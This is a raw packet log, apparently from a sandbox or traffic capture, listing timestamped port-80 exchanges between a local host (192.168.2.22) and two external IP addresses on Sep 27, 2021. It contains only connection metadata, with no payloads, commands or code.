Sep 27, 2021 21:19:41.629378080 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:41.629389048 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:41.629420996 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:41.629431963 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:41.629445076 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:41.629458904 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:41.629476070 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:41.629508972 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:41.629550934 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:46.549180984 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:46.549207926 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:46.549221039 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:46.549241066 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:46.549308062 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:46.549325943 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:46.549340010 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:46.549380064 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:46.549468994 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:46.549485922 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:46.549500942 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:46.549521923 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:46.549627066 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:46.549679041 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:46.550730944 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:46.727076054 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:46.727188110 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:46.727241993 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:46.727277994 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:46.727433920 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:46.727456093 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:46.852746964 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:46.852823019 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:46.852860928 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:46.852900028 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:46.852940083 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:46.852977037 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:46.853015900 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:46.853040934 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:46.853066921 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:46.853102922 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:46.853136063 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:46.853188038 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:46.853213072 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:46.853264093 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:46.853276014 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:46.853317022 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:46.853338003 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:46.853370905 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:46.853391886 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:46.853461981 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:46.854805946 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:46.904963970 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:46.905237913 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:47.210500002 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:47.210565090 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:47.210603952 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:47.210653067 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:47.210707903 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:47.210726976 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:47.210740089 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:47.210746050 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:47.210792065 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:47.210833073 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:47.210860014 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:47.210891008 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:47.210916042 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:47.210958958 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:47.210983038 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:47.211014032 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:47.211045980 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:47.211088896 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:47.211111069 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:47.211198092 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:47.211301088 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:47.211335897 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:47.211374044 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:47.211402893 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:47.211414099 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:47.211467981 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:47.211497068 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:47.211539030 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:47.211563110 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:47.211612940 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:47.211625099 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:47.211668015 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:47.211684942 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:47.211724997 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:47.211740971 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:47.211786032 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:47.212610960 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:47.391881943 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:47.391915083 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:47.391927958 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:47.391942024 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:47.391959906 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:47.392149925 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:47.392175913 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:47.392242908 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:47.507823944 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:47.507855892 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:47.507869005 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:47.507910967 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:47.507939100 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:47.507993937 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:47.508039951 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:47.508065939 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:47.508084059 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:47.508093119 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:47.508095980 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:47.508097887 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:47.508100033 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:47.508142948 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:47.508156061 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:47.508193016 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:47.508239985 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:47.508270025 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:47.508302927 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:47.508306980 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:47.508310080 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:47.508311987 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:47.508361101 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:47.508675098 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:47.630044937 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:47.630307913 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:47.758969069 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:47.759259939 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:47.810750008 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:47.810786009 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:47.810807943 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:47.810828924 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:47.810848951 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:47.810874939 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:47.810904980 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:47.810918093 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:47.810928106 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:47.810954094 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:47.810993910 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:47.811014891 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:47.811045885 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:47.811062098 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:47.811096907 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:47.811130047 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:47.811158895 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:47.811167002 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:47.811171055 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:47.812834024 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:48.056535959 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:48.056600094 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:48.056638956 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:48.056687117 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:48.056729078 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:48.056766987 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:48.056797028 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:48.056828022 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:48.056854010 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:48.056879997 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:48.056926966 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:48.056983948 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:48.057012081 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:48.057041883 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:48.057075024 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:48.057118893 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:48.057141066 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:48.057190895 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:48.057224989 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:48.057254076 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:48.057276964 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:48.057303905 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:48.057327032 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:48.057364941 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:48.057382107 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:48.057425976 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:48.057450056 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:48.057507038 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:48.059238911 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:48.234986067 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:48.235023022 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:48.235037088 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:48.235049963 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:48.235063076 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:48.235075951 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:48.235088110 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:48.235099077 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:48.235388041 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:48.333194971 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:48.333228111 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:48.333240986 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:48.333261013 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:48.333280087 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:48.333296061 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:48.333312035 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:48.333328009 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:48.333343983 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:48.333360910 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:48.333483934 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:48.333501101 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:48.335829020 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:48.413434982 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:48.413463116 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:48.413471937 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:48.413625002 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:48.627264977 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:48.627304077 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:48.627325058 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:48.627350092 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:48.627361059 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:48.627374887 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:48.627386093 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:48.627405882 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:48.627418995 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:48.627443075 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:48.627456903 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:48.627475977 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:48.627487898 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:48.627512932 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:48.627525091 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:48.627547026 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:48.627568960 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:48.627587080 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:48.627594948 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:48.627618074 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:48.627631903 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:48.627649069 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:48.627665043 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:48.627687931 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:48.627701998 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:48.627718925 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:48.627734900 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:48.627758980 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:48.627773046 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:48.627790928 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:48.627804995 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:48.627827883 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:48.627840996 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:48.627857924 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:48.627876043 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:48.627897978 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:48.627912998 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:48.627928972 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:48.807025909 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:48.807260036 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:48.807346106 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:48.807391882 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:48.807425976 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:48.807450056 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:48.807471991 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:48.807504892 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:48.807532072 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:48.807559013 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:48.807576895 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:48.807619095 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:48.807676077 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:48.807729006 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:48.968795061 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:48.968986034 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:48.985207081 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:48.985235929 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:48.985258102 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:48.985279083 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:48.985300064 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:48.985320091 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:48.985342026 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:48.985363007 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:48.985382080 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:48.985397100 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:48.985409975 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:48.985433102 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:48.985455036 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:48.985460997 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:48.985477924 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:48.985490084 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:48.985507011 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:48.985519886 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:48.985527992 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:48.985555887 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:48.986510038 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:49.146265984 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:49.146445036 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:49.162724972 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:49.162763119 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:49.162781000 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:49.162868977 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:49.162888050 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:49.162904978 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:49.162915945 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:49.162918091 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:49.162925005 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:49.162931919 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:49.342082024 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:19:49.342540026 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:19:49.393999100 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.423476934 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.423605919 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.424195051 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.451919079 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.696156979 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.696285009 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.696330070 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.696353912 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.696373940 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.696392059 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.696414948 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.696455956 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.696495056 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.696511984 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.696556091 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.696592093 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.696630955 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.696671963 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.696691990 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.696758986 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.699800014 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.724301100 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.724359989 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.724541903 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.724793911 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.724838018 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.724878073 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.724880934 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.724893093 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.724917889 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.724936962 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.724962950 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.724965096 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.725024939 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.725096941 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.725136995 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.725150108 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.725178957 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.725192070 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.725219965 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.725219965 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.725258112 CEST	80	49166	185.183.96.67	192.168.2.22
